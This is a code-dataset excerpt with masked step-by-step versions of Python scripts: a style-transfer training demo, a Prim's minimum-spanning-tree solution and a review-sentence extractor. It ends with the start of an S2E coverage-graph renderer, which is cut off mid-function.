"index": 5366,
"step-1": "<mask token>\n\n\ndef main():\n if IS_TRAINING:\n training_imgs_paths = list_images(TRAINING_IMGS_PATH)\n train(training_imgs_paths, ENCODER_WEIGHTS_PATH, MODEL_SAVE_PATH,\n autoencoder_levels=AUTUENCODER_LEVELS_TRAIN, debug=DEBUG,\n logging_period=LOGGING_PERIOD)\n print('\\n>>>>>> Successfully done training...\\n')\n else:\n contents_path = list_images(CONTENTS_DIR)\n styles_path = list_images(STYLES_DIR)\n model_path = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX\n stylize(contents_path, styles_path, OUTPUT_DIR,\n ENCODER_WEIGHTS_PATH, model_path, style_ratio=STYLE_RATIO,\n repeat_pipeline=REPEAT_PIPELINE, autoencoder_levels=\n AUTUENCODER_LEVELS_INFER)\n print('\\n>>>>>> Successfully done stylizing...\\n')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n if IS_TRAINING:\n training_imgs_paths = list_images(TRAINING_IMGS_PATH)\n train(training_imgs_paths, ENCODER_WEIGHTS_PATH, MODEL_SAVE_PATH,\n autoencoder_levels=AUTUENCODER_LEVELS_TRAIN, debug=DEBUG,\n logging_period=LOGGING_PERIOD)\n print('\\n>>>>>> Successfully done training...\\n')\n else:\n contents_path = list_images(CONTENTS_DIR)\n styles_path = list_images(STYLES_DIR)\n model_path = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX\n stylize(contents_path, styles_path, OUTPUT_DIR,\n ENCODER_WEIGHTS_PATH, model_path, style_ratio=STYLE_RATIO,\n repeat_pipeline=REPEAT_PIPELINE, autoencoder_levels=\n AUTUENCODER_LEVELS_INFER)\n print('\\n>>>>>> Successfully done stylizing...\\n')\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nIS_TRAINING = True\nTRAINING_IMGS_PATH = 'MS_COCO'\nENCODER_WEIGHTS_PATH = 'vgg19_normalised.npz'\nMODEL_SAVE_PATH = 'models/autoencoder'\nMODEL_SAVE_SUFFIX = '-done'\nDEBUG = True\nLOGGING_PERIOD = 10\nAUTUENCODER_LEVELS_TRAIN = [5, 4, 3, 2, 1]\nCONTENTS_DIR = 'images/content'\nSTYLES_DIR = 'images/style'\nOUTPUT_DIR = 'outputs'\nSTYLE_RATIO = 0.8\nREPEAT_PIPELINE = 1\nAUTUENCODER_LEVELS_INFER = [3, 2, 1]\n\n\ndef main():\n if IS_TRAINING:\n training_imgs_paths = list_images(TRAINING_IMGS_PATH)\n train(training_imgs_paths, ENCODER_WEIGHTS_PATH, MODEL_SAVE_PATH,\n autoencoder_levels=AUTUENCODER_LEVELS_TRAIN, debug=DEBUG,\n logging_period=LOGGING_PERIOD)\n print('\\n>>>>>> Successfully done training...\\n')\n else:\n contents_path = list_images(CONTENTS_DIR)\n styles_path = list_images(STYLES_DIR)\n model_path = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX\n stylize(contents_path, styles_path, OUTPUT_DIR,\n ENCODER_WEIGHTS_PATH, model_path, style_ratio=STYLE_RATIO,\n repeat_pipeline=REPEAT_PIPELINE, autoencoder_levels=\n AUTUENCODER_LEVELS_INFER)\n print('\\n>>>>>> Successfully done stylizing...\\n')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from __future__ import print_function\nfrom train import train\nfrom infer import stylize\nfrom utils import list_images\nIS_TRAINING = True\nTRAINING_IMGS_PATH = 'MS_COCO'\nENCODER_WEIGHTS_PATH = 'vgg19_normalised.npz'\nMODEL_SAVE_PATH = 'models/autoencoder'\nMODEL_SAVE_SUFFIX = '-done'\nDEBUG = True\nLOGGING_PERIOD = 10\nAUTUENCODER_LEVELS_TRAIN = [5, 4, 3, 2, 1]\nCONTENTS_DIR = 'images/content'\nSTYLES_DIR = 'images/style'\nOUTPUT_DIR = 'outputs'\nSTYLE_RATIO = 0.8\nREPEAT_PIPELINE = 1\nAUTUENCODER_LEVELS_INFER = [3, 2, 1]\n\n\ndef main():\n if IS_TRAINING:\n training_imgs_paths = list_images(TRAINING_IMGS_PATH)\n train(training_imgs_paths, ENCODER_WEIGHTS_PATH, MODEL_SAVE_PATH,\n autoencoder_levels=AUTUENCODER_LEVELS_TRAIN, debug=DEBUG,\n logging_period=LOGGING_PERIOD)\n print('\\n>>>>>> Successfully done training...\\n')\n else:\n contents_path = list_images(CONTENTS_DIR)\n styles_path = list_images(STYLES_DIR)\n model_path = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX\n stylize(contents_path, styles_path, OUTPUT_DIR,\n ENCODER_WEIGHTS_PATH, model_path, style_ratio=STYLE_RATIO,\n repeat_pipeline=REPEAT_PIPELINE, autoencoder_levels=\n AUTUENCODER_LEVELS_INFER)\n print('\\n>>>>>> Successfully done stylizing...\\n')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# Demo - train the decoders & use them to stylize image\n\nfrom __future__ import print_function\n\nfrom train import train\nfrom infer import stylize\nfrom utils import list_images\n\n\nIS_TRAINING = True\n\n# for training\nTRAINING_IMGS_PATH = 'MS_COCO'\nENCODER_WEIGHTS_PATH = 'vgg19_normalised.npz'\nMODEL_SAVE_PATH = 'models/autoencoder'\nMODEL_SAVE_SUFFIX = '-done'\n\nDEBUG = True\nLOGGING_PERIOD = 10\nAUTUENCODER_LEVELS_TRAIN = [5, 4, 3, 2, 1]\n\n# for inferring (stylize)\nCONTENTS_DIR = 'images/content'\nSTYLES_DIR = 'images/style'\nOUTPUT_DIR = 'outputs'\n\nSTYLE_RATIO = 0.8\nREPEAT_PIPELINE = 1\nAUTUENCODER_LEVELS_INFER = [3, 2, 1]\n\n\ndef main():\n\n if IS_TRAINING:\n training_imgs_paths = list_images(TRAINING_IMGS_PATH)\n\n train(training_imgs_paths,\n ENCODER_WEIGHTS_PATH,\n MODEL_SAVE_PATH,\n autoencoder_levels=AUTUENCODER_LEVELS_TRAIN,\n debug=DEBUG,\n logging_period=LOGGING_PERIOD)\n \n print('\\n>>>>>> Successfully done training...\\n')\n\n else:\n contents_path = list_images(CONTENTS_DIR)\n styles_path = list_images(STYLES_DIR)\n model_path = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX\n\n stylize(contents_path, \n styles_path, \n OUTPUT_DIR, \n ENCODER_WEIGHTS_PATH, \n model_path, \n style_ratio=STYLE_RATIO,\n repeat_pipeline=REPEAT_PIPELINE,\n autoencoder_levels=AUTUENCODER_LEVELS_INFER)\n\n print('\\n>>>>>> Successfully done stylizing...\\n')\n\n\nif __name__ == '__main__':\n main()\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# from __future__ import annotations
from typing import List,Union,Tuple,Dict,Set
import sys
input = sys.stdin.readline
# from collections import defaultdict,deque
# from itertools import permutations,combinations
# from bisect import bisect_left,bisect_right
import heapq
# sys.setrecursionlimit(10**5)
# class UnionFind():
# def __init__(self, N:int):
# self.par = [-1]*N
# self.size = [1]*N
# def root(self, x:int):
# if self.par[x] == -1: return x
# self.par[x] = self.root(self.par[x])
# self.size[x] = 1
# return self.par[x]
# def unite(self, x:int, y:int):
# rx,ry = self.root(x), self.root(y)
# if rx == ry: return False
# if self.size[rx] >= self.size[ry]:
# self.par[ry] = rx
# self.size[rx] += self.size[ry]
# else:
# self.par[rx] = ry
# self.size[ry] += self.size[rx]
# return True
# #! クラスカル法
# def main():
# N,M,K = map(int, input().split())
# edges = []
# for _ in range(M):
# a,b,c = map(int, input().split())
# a -= 1
# b -= 1
# edges.append((c,a,b))
# edges.sort()
# unionfind = UnionFind(N)
# ans = 0
# used = []
# for c,a,b in edges:
# if unionfind.unite(a,b):
# ans += c
# used.append(c)
# for i in range(1,K):
# ans -= used[-i]
# print(ans)
#! プリム法
def main():
N,M,K = map(int, input().split())
G = [[] for _ in range(N)]
for _ in range(M):
a,b,c = map(int, input().split())
a -= 1
b -= 1
G[a].append((c,b))
G[b].append((c,a))
ans = 0
used = []
marked = [False]*N
Q = [] #* (通行料金,都市)
heapq.heappush(Q,(0,0))
while len(Q)>0:
fee,curr = heapq.heappop(Q)
if marked[curr]: continue
marked[curr] = True
ans += fee
used.append(fee)
for nxt_fee,nxt in G[curr]:
if marked[nxt]: continue
heapq.heappush(Q, (nxt_fee,nxt))
used.sort()
for i in range(1,K):
ans -= used[-i]
print(ans)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "13b2e05f12c6d0cd91e89f01e7eef610b1e99856",
"index": 9158,
"step-1": "<mask token>\n\n\ndef main():\n N, M, K = map(int, input().split())\n G = [[] for _ in range(N)]\n for _ in range(M):\n a, b, c = map(int, input().split())\n a -= 1\n b -= 1\n G[a].append((c, b))\n G[b].append((c, a))\n ans = 0\n used = []\n marked = [False] * N\n Q = []\n heapq.heappush(Q, (0, 0))\n while len(Q) > 0:\n fee, curr = heapq.heappop(Q)\n if marked[curr]:\n continue\n marked[curr] = True\n ans += fee\n used.append(fee)\n for nxt_fee, nxt in G[curr]:\n if marked[nxt]:\n continue\n heapq.heappush(Q, (nxt_fee, nxt))\n used.sort()\n for i in range(1, K):\n ans -= used[-i]\n print(ans)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n N, M, K = map(int, input().split())\n G = [[] for _ in range(N)]\n for _ in range(M):\n a, b, c = map(int, input().split())\n a -= 1\n b -= 1\n G[a].append((c, b))\n G[b].append((c, a))\n ans = 0\n used = []\n marked = [False] * N\n Q = []\n heapq.heappush(Q, (0, 0))\n while len(Q) > 0:\n fee, curr = heapq.heappop(Q)\n if marked[curr]:\n continue\n marked[curr] = True\n ans += fee\n used.append(fee)\n for nxt_fee, nxt in G[curr]:\n if marked[nxt]:\n continue\n heapq.heappush(Q, (nxt_fee, nxt))\n used.sort()\n for i in range(1, K):\n ans -= used[-i]\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\ninput = sys.stdin.readline\n<mask token>\n\n\ndef main():\n N, M, K = map(int, input().split())\n G = [[] for _ in range(N)]\n for _ in range(M):\n a, b, c = map(int, input().split())\n a -= 1\n b -= 1\n G[a].append((c, b))\n G[b].append((c, a))\n ans = 0\n used = []\n marked = [False] * N\n Q = []\n heapq.heappush(Q, (0, 0))\n while len(Q) > 0:\n fee, curr = heapq.heappop(Q)\n if marked[curr]:\n continue\n marked[curr] = True\n ans += fee\n used.append(fee)\n for nxt_fee, nxt in G[curr]:\n if marked[nxt]:\n continue\n heapq.heappush(Q, (nxt_fee, nxt))\n used.sort()\n for i in range(1, K):\n ans -= used[-i]\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from typing import List, Union, Tuple, Dict, Set\nimport sys\ninput = sys.stdin.readline\nimport heapq\n\n\ndef main():\n N, M, K = map(int, input().split())\n G = [[] for _ in range(N)]\n for _ in range(M):\n a, b, c = map(int, input().split())\n a -= 1\n b -= 1\n G[a].append((c, b))\n G[b].append((c, a))\n ans = 0\n used = []\n marked = [False] * N\n Q = []\n heapq.heappush(Q, (0, 0))\n while len(Q) > 0:\n fee, curr = heapq.heappop(Q)\n if marked[curr]:\n continue\n marked[curr] = True\n ans += fee\n used.append(fee)\n for nxt_fee, nxt in G[curr]:\n if marked[nxt]:\n continue\n heapq.heappush(Q, (nxt_fee, nxt))\n used.sort()\n for i in range(1, K):\n ans -= used[-i]\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# from __future__ import annotations\nfrom typing import List,Union,Tuple,Dict,Set\nimport sys\ninput = sys.stdin.readline\n# from collections import defaultdict,deque\n# from itertools import permutations,combinations\n# from bisect import bisect_left,bisect_right\nimport heapq\n# sys.setrecursionlimit(10**5)\n\n# class UnionFind():\n\n# def __init__(self, N:int):\n# self.par = [-1]*N\n# self.size = [1]*N\n\n# def root(self, x:int):\n# if self.par[x] == -1: return x\n# self.par[x] = self.root(self.par[x])\n# self.size[x] = 1\n# return self.par[x]\n\n# def unite(self, x:int, y:int):\n# rx,ry = self.root(x), self.root(y)\n# if rx == ry: return False\n# if self.size[rx] >= self.size[ry]:\n# self.par[ry] = rx\n# self.size[rx] += self.size[ry]\n# else:\n# self.par[rx] = ry\n# self.size[ry] += self.size[rx]\n# return True\n\n# #! クラスカル法\n# def main():\n# N,M,K = map(int, input().split())\n# edges = []\n# for _ in range(M):\n# a,b,c = map(int, input().split())\n# a -= 1\n# b -= 1\n# edges.append((c,a,b))\n# edges.sort()\n# unionfind = UnionFind(N)\n# ans = 0\n# used = []\n# for c,a,b in edges:\n# if unionfind.unite(a,b):\n# ans += c\n# used.append(c)\n\n# for i in range(1,K):\n# ans -= used[-i]\n\n# print(ans)\n\n#! プリム法\ndef main():\n N,M,K = map(int, input().split())\n G = [[] for _ in range(N)]\n for _ in range(M):\n a,b,c = map(int, input().split())\n a -= 1\n b -= 1\n G[a].append((c,b))\n G[b].append((c,a))\n\n ans = 0\n used = []\n\n marked = [False]*N\n Q = [] #* (通行料金,都市)\n heapq.heappush(Q,(0,0))\n while len(Q)>0:\n fee,curr = heapq.heappop(Q)\n if marked[curr]: continue\n marked[curr] = True\n ans += fee\n used.append(fee)\n for nxt_fee,nxt in G[curr]:\n if marked[nxt]: continue\n heapq.heappush(Q, (nxt_fee,nxt))\n\n used.sort()\n for i in range(1,K):\n ans -= used[-i]\n\n print(ans)\n\nif __name__ == '__main__':\n main()",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def wordCount(db):
words = {}
for sent, labels in iterReviews(db):
for word in sent:
if word not in words:
words[word] = 1
else:
words[word] += 1
return words
def filterWords(words, min_count=0):
return set(word for word in words if words[word] >= min_count)
<|reserved_special_token_0|>
def main(args):
f = open(args.output, 'w', encoding='utf-8')
buff = []
i = 0
words = filterWords(wordCount(args.db), min_count=args.min_count)
for sent, labels in iterReviews(args.db):
sent = [word for word in sent if word in words]
if len(sent) < args.min_sent_size:
continue
for label in labels:
buff.append('{} {}\n'.format(label, ' '.join(sent)))
i += 1
if len(buff) >= args.buff_size:
shuffle(buff)
for se in buff:
f.write(se)
buff = []
print('wrote {} sentences'.format(i))
shuffle(buff)
for se in buff:
f.write(se)
f.close()
print('wrote {} sentences'.format(i))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def wordCount(db):
words = {}
for sent, labels in iterReviews(db):
for word in sent:
if word not in words:
words[word] = 1
else:
words[word] += 1
return words
def filterWords(words, min_count=0):
return set(word for word in words if words[word] >= min_count)
def iterReviews(db):
con = sqlite3.connect(db)
c = con.cursor()
i = 0
for pid, uname, rev, rating in c.execute(
'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'
):
if pid is None or uname is None or rating is None or rev is None:
continue
else:
for sent in rev.split('.'):
if len(sent) < 2:
continue
else:
yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.
format(pid), 'r_{}'.format(rating)]
i += 1
def main(args):
f = open(args.output, 'w', encoding='utf-8')
buff = []
i = 0
words = filterWords(wordCount(args.db), min_count=args.min_count)
for sent, labels in iterReviews(args.db):
sent = [word for word in sent if word in words]
if len(sent) < args.min_sent_size:
continue
for label in labels:
buff.append('{} {}\n'.format(label, ' '.join(sent)))
i += 1
if len(buff) >= args.buff_size:
shuffle(buff)
for se in buff:
f.write(se)
buff = []
print('wrote {} sentences'.format(i))
shuffle(buff)
for se in buff:
f.write(se)
f.close()
print('wrote {} sentences'.format(i))
<|reserved_special_token_0|>
parser.add_argument('db', type=str)
parser.add_argument('output', type=str, default='sentences.txt')
parser.add_argument('--min_count', type=int, default=100)
parser.add_argument('--min_sent_size', type=int, default=5)
parser.add_argument('--buff_size', type=int, default=1000000)
<|reserved_special_token_0|>
main(args)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def wordCount(db):
words = {}
for sent, labels in iterReviews(db):
for word in sent:
if word not in words:
words[word] = 1
else:
words[word] += 1
return words
def filterWords(words, min_count=0):
return set(word for word in words if words[word] >= min_count)
def iterReviews(db):
con = sqlite3.connect(db)
c = con.cursor()
i = 0
for pid, uname, rev, rating in c.execute(
'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'
):
if pid is None or uname is None or rating is None or rev is None:
continue
else:
for sent in rev.split('.'):
if len(sent) < 2:
continue
else:
yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.
format(pid), 'r_{}'.format(rating)]
i += 1
def main(args):
f = open(args.output, 'w', encoding='utf-8')
buff = []
i = 0
words = filterWords(wordCount(args.db), min_count=args.min_count)
for sent, labels in iterReviews(args.db):
sent = [word for word in sent if word in words]
if len(sent) < args.min_sent_size:
continue
for label in labels:
buff.append('{} {}\n'.format(label, ' '.join(sent)))
i += 1
if len(buff) >= args.buff_size:
shuffle(buff)
for se in buff:
f.write(se)
buff = []
print('wrote {} sentences'.format(i))
shuffle(buff)
for se in buff:
f.write(se)
f.close()
print('wrote {} sentences'.format(i))
parser = argparse.ArgumentParser()
parser.add_argument('db', type=str)
parser.add_argument('output', type=str, default='sentences.txt')
parser.add_argument('--min_count', type=int, default=100)
parser.add_argument('--min_sent_size', type=int, default=5)
parser.add_argument('--buff_size', type=int, default=1000000)
args = parser.parse_args()
main(args)
<|reserved_special_token_1|>
import sqlite3
from random import shuffle
import argparse
def wordCount(db):
words = {}
for sent, labels in iterReviews(db):
for word in sent:
if word not in words:
words[word] = 1
else:
words[word] += 1
return words
def filterWords(words, min_count=0):
return set(word for word in words if words[word] >= min_count)
def iterReviews(db):
con = sqlite3.connect(db)
c = con.cursor()
i = 0
for pid, uname, rev, rating in c.execute(
'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'
):
if pid is None or uname is None or rating is None or rev is None:
continue
else:
for sent in rev.split('.'):
if len(sent) < 2:
continue
else:
yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.
format(pid), 'r_{}'.format(rating)]
i += 1
def main(args):
f = open(args.output, 'w', encoding='utf-8')
buff = []
i = 0
words = filterWords(wordCount(args.db), min_count=args.min_count)
for sent, labels in iterReviews(args.db):
sent = [word for word in sent if word in words]
if len(sent) < args.min_sent_size:
continue
for label in labels:
buff.append('{} {}\n'.format(label, ' '.join(sent)))
i += 1
if len(buff) >= args.buff_size:
shuffle(buff)
for se in buff:
f.write(se)
buff = []
print('wrote {} sentences'.format(i))
shuffle(buff)
for se in buff:
f.write(se)
f.close()
print('wrote {} sentences'.format(i))
parser = argparse.ArgumentParser()
parser.add_argument('db', type=str)
parser.add_argument('output', type=str, default='sentences.txt')
parser.add_argument('--min_count', type=int, default=100)
parser.add_argument('--min_sent_size', type=int, default=5)
parser.add_argument('--buff_size', type=int, default=1000000)
args = parser.parse_args()
main(args)
<|reserved_special_token_1|>
#coding: utf8
import sqlite3
from random import shuffle
import argparse
def wordCount(db):
words = {}
for sent, labels in iterReviews(db):
for word in sent:
if word not in words:
words[word] = 1
else:
words[word] += 1
return words
def filterWords(words, min_count=0):
return set(word for word in words if words[word] >= min_count)
def iterReviews(db):
con = sqlite3.connect(db)
c = con.cursor()
i = 0
for pid, uname, rev, rating in c.execute('SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'):
if pid is None or uname is None or rating is None or rev is None:
continue
else:
for sent in rev.split("."):
if len(sent) < 2:
continue
else:
yield (sent.split(" "), ['u_{}'.format(uname),'i_{}'.format(pid), 'r_{}'.format(rating)])
i += 1
def main(args):
f = open(args.output, "w",encoding="utf-8")
buff = []
i = 0
words = filterWords(wordCount(args.db), min_count=args.min_count)
for sent, labels in iterReviews(args.db):
sent = [word for word in sent if word in words]
if len(sent) < args.min_sent_size:
continue
for label in labels:
buff.append("{} {}\n".format(label, " ".join(sent)))
i += 1
if len(buff) >= args.buff_size:
shuffle(buff)
for se in buff:
f.write(se)
buff = []
print("wrote {} sentences".format(i))
shuffle(buff)
for se in buff:
f.write(se)
f.close()
print("wrote {} sentences".format(i))
parser = argparse.ArgumentParser()
parser.add_argument("db", type=str)
parser.add_argument("output", type=str, default="sentences.txt")
parser.add_argument("--min_count", type=int, default=100)
parser.add_argument("--min_sent_size", type=int, default=5)
parser.add_argument("--buff_size", type=int, default=1000000)
args = parser.parse_args()
main(args)
|
flexible
|
{
"blob_id": "04867e8911f7cb30af6cefb7ba7ff34d02a07891",
"index": 7970,
"step-1": "<mask token>\n\n\ndef wordCount(db):\n words = {}\n for sent, labels in iterReviews(db):\n for word in sent:\n if word not in words:\n words[word] = 1\n else:\n words[word] += 1\n return words\n\n\ndef filterWords(words, min_count=0):\n return set(word for word in words if words[word] >= min_count)\n\n\n<mask token>\n\n\ndef main(args):\n f = open(args.output, 'w', encoding='utf-8')\n buff = []\n i = 0\n words = filterWords(wordCount(args.db), min_count=args.min_count)\n for sent, labels in iterReviews(args.db):\n sent = [word for word in sent if word in words]\n if len(sent) < args.min_sent_size:\n continue\n for label in labels:\n buff.append('{} {}\\n'.format(label, ' '.join(sent)))\n i += 1\n if len(buff) >= args.buff_size:\n shuffle(buff)\n for se in buff:\n f.write(se)\n buff = []\n print('wrote {} sentences'.format(i))\n shuffle(buff)\n for se in buff:\n f.write(se)\n f.close()\n print('wrote {} sentences'.format(i))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef wordCount(db):\n words = {}\n for sent, labels in iterReviews(db):\n for word in sent:\n if word not in words:\n words[word] = 1\n else:\n words[word] += 1\n return words\n\n\ndef filterWords(words, min_count=0):\n return set(word for word in words if words[word] >= min_count)\n\n\ndef iterReviews(db):\n con = sqlite3.connect(db)\n c = con.cursor()\n i = 0\n for pid, uname, rev, rating in c.execute(\n 'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'\n ):\n if pid is None or uname is None or rating is None or rev is None:\n continue\n else:\n for sent in rev.split('.'):\n if len(sent) < 2:\n continue\n else:\n yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.\n format(pid), 'r_{}'.format(rating)]\n i += 1\n\n\ndef main(args):\n f = open(args.output, 'w', encoding='utf-8')\n buff = []\n i = 0\n words = filterWords(wordCount(args.db), min_count=args.min_count)\n for sent, labels in iterReviews(args.db):\n sent = [word for word in sent if word in words]\n if len(sent) < args.min_sent_size:\n continue\n for label in labels:\n buff.append('{} {}\\n'.format(label, ' '.join(sent)))\n i += 1\n if len(buff) >= args.buff_size:\n shuffle(buff)\n for se in buff:\n f.write(se)\n buff = []\n print('wrote {} sentences'.format(i))\n shuffle(buff)\n for se in buff:\n f.write(se)\n f.close()\n print('wrote {} sentences'.format(i))\n\n\n<mask token>\nparser.add_argument('db', type=str)\nparser.add_argument('output', type=str, default='sentences.txt')\nparser.add_argument('--min_count', type=int, default=100)\nparser.add_argument('--min_sent_size', type=int, default=5)\nparser.add_argument('--buff_size', type=int, default=1000000)\n<mask token>\nmain(args)\n",
"step-3": "<mask token>\n\n\ndef wordCount(db):\n words = {}\n for sent, labels in iterReviews(db):\n for word in sent:\n if word not in words:\n words[word] = 1\n else:\n words[word] += 1\n return words\n\n\ndef filterWords(words, min_count=0):\n return set(word for word in words if words[word] >= min_count)\n\n\ndef iterReviews(db):\n con = sqlite3.connect(db)\n c = con.cursor()\n i = 0\n for pid, uname, rev, rating in c.execute(\n 'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'\n ):\n if pid is None or uname is None or rating is None or rev is None:\n continue\n else:\n for sent in rev.split('.'):\n if len(sent) < 2:\n continue\n else:\n yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.\n format(pid), 'r_{}'.format(rating)]\n i += 1\n\n\ndef main(args):\n f = open(args.output, 'w', encoding='utf-8')\n buff = []\n i = 0\n words = filterWords(wordCount(args.db), min_count=args.min_count)\n for sent, labels in iterReviews(args.db):\n sent = [word for word in sent if word in words]\n if len(sent) < args.min_sent_size:\n continue\n for label in labels:\n buff.append('{} {}\\n'.format(label, ' '.join(sent)))\n i += 1\n if len(buff) >= args.buff_size:\n shuffle(buff)\n for se in buff:\n f.write(se)\n buff = []\n print('wrote {} sentences'.format(i))\n shuffle(buff)\n for se in buff:\n f.write(se)\n f.close()\n print('wrote {} sentences'.format(i))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('db', type=str)\nparser.add_argument('output', type=str, default='sentences.txt')\nparser.add_argument('--min_count', type=int, default=100)\nparser.add_argument('--min_sent_size', type=int, default=5)\nparser.add_argument('--buff_size', type=int, default=1000000)\nargs = parser.parse_args()\nmain(args)\n",
"step-4": "import sqlite3\nfrom random import shuffle\nimport argparse\n\n\ndef wordCount(db):\n words = {}\n for sent, labels in iterReviews(db):\n for word in sent:\n if word not in words:\n words[word] = 1\n else:\n words[word] += 1\n return words\n\n\ndef filterWords(words, min_count=0):\n return set(word for word in words if words[word] >= min_count)\n\n\ndef iterReviews(db):\n con = sqlite3.connect(db)\n c = con.cursor()\n i = 0\n for pid, uname, rev, rating in c.execute(\n 'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'\n ):\n if pid is None or uname is None or rating is None or rev is None:\n continue\n else:\n for sent in rev.split('.'):\n if len(sent) < 2:\n continue\n else:\n yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.\n format(pid), 'r_{}'.format(rating)]\n i += 1\n\n\ndef main(args):\n f = open(args.output, 'w', encoding='utf-8')\n buff = []\n i = 0\n words = filterWords(wordCount(args.db), min_count=args.min_count)\n for sent, labels in iterReviews(args.db):\n sent = [word for word in sent if word in words]\n if len(sent) < args.min_sent_size:\n continue\n for label in labels:\n buff.append('{} {}\\n'.format(label, ' '.join(sent)))\n i += 1\n if len(buff) >= args.buff_size:\n shuffle(buff)\n for se in buff:\n f.write(se)\n buff = []\n print('wrote {} sentences'.format(i))\n shuffle(buff)\n for se in buff:\n f.write(se)\n f.close()\n print('wrote {} sentences'.format(i))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('db', type=str)\nparser.add_argument('output', type=str, default='sentences.txt')\nparser.add_argument('--min_count', type=int, default=100)\nparser.add_argument('--min_sent_size', type=int, default=5)\nparser.add_argument('--buff_size', type=int, default=1000000)\nargs = parser.parse_args()\nmain(args)\n",
"step-5": "#coding: utf8\n\nimport sqlite3\nfrom random import shuffle\nimport argparse\n\n\ndef wordCount(db):\n words = {}\n for sent, labels in iterReviews(db):\n for word in sent:\n if word not in words:\n words[word] = 1\n else:\n words[word] += 1\n return words\n\n\ndef filterWords(words, min_count=0):\n return set(word for word in words if words[word] >= min_count)\n\n\ndef iterReviews(db):\n con = sqlite3.connect(db)\n c = con.cursor()\n i = 0\n\n for pid, uname, rev, rating in c.execute('SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'):\n if pid is None or uname is None or rating is None or rev is None:\n continue\n else:\n for sent in rev.split(\".\"):\n if len(sent) < 2:\n continue\n else:\n yield (sent.split(\" \"), ['u_{}'.format(uname),'i_{}'.format(pid), 'r_{}'.format(rating)])\n i += 1\n\n\ndef main(args):\n f = open(args.output, \"w\",encoding=\"utf-8\")\n buff = []\n i = 0\n\n words = filterWords(wordCount(args.db), min_count=args.min_count)\n\n for sent, labels in iterReviews(args.db):\n\n sent = [word for word in sent if word in words]\n\n if len(sent) < args.min_sent_size:\n continue\n\n for label in labels:\n buff.append(\"{} {}\\n\".format(label, \" \".join(sent)))\n i += 1\n\n if len(buff) >= args.buff_size:\n shuffle(buff)\n for se in buff:\n f.write(se)\n buff = []\n print(\"wrote {} sentences\".format(i))\n\n shuffle(buff)\n for se in buff:\n f.write(se)\n f.close()\n\n print(\"wrote {} sentences\".format(i))\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"db\", type=str)\nparser.add_argument(\"output\", type=str, default=\"sentences.txt\")\nparser.add_argument(\"--min_count\", type=int, default=100)\nparser.add_argument(\"--min_sent_size\", type=int, default=5)\nparser.add_argument(\"--buff_size\", type=int, default=1000000)\nargs = parser.parse_args()\n\nmain(args)\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
"""
Copyright (C) Adrian Herrera, 2017
You will need to install r2pipe and pydot:
```
pip install r2pipe pydot
```
"""
from __future__ import print_function
import glob
import json
import os
import pydot
import r2pipe
import s2e_web.S2E_settings as S2E_settings
def function_addrs(r2):
"""
Yield a list of all the function's start addresses.
"""
for addr in r2.cmdj('aflqj'):
yield int(addr, 16)
def parse_tb_file(path, module):
"""
Parse a translation block coverage file generated by S2E's
``TranslationBlockCoverage`` plugin.
"""
with open(path, 'r') as f:
try:
tb_coverage_data = json.load(f)
except Exception:
print('WARN: Failed to parse translation block JSON file %s' % path)
return None
if not tb_coverage_data:
print('WARN: Translation block JSON file %s is empty' % path)
return None
if module not in tb_coverage_data:
print('WARN: Target %s not found in translation block JSON file %s' %
(module, path))
return None
return tb_coverage_data[module]
def basic_block_coverage(r2, translation_blocks):
"""
Calculate the basic block coverage based on the covered TBs.
Returns a set of *covered* basic block start addresses
"""
covered_bbs = set()
for func_addr in function_addrs(r2):
graph = r2.cmdj('agj 0x%x' % func_addr)
assert len(graph) == 1
graph = graph[0]
for tb_start_addr, tb_end_addr in translation_blocks:
for bb in graph['blocks']:
bb_start_addr = bb['offset']
bb_end_addr = bb_start_addr + bb['size']
# Check if the translation block falls within a basic block OR
# a basic block falls within a translation block
if (bb_end_addr >= tb_start_addr >= bb_start_addr or
bb_start_addr <= tb_end_addr <= bb_end_addr):
covered_bbs.add(bb_start_addr)
return covered_bbs
def render_functions(r2, covered_bbs, output_dir):
"""
Renders SVG graphs of each of the functions in the program. Basic blocks
that were executed by S2E are coloured green.
The resulting SVG images are written to `output_dir`.
"""
for func_addr in function_addrs(r2):
# Get the function name
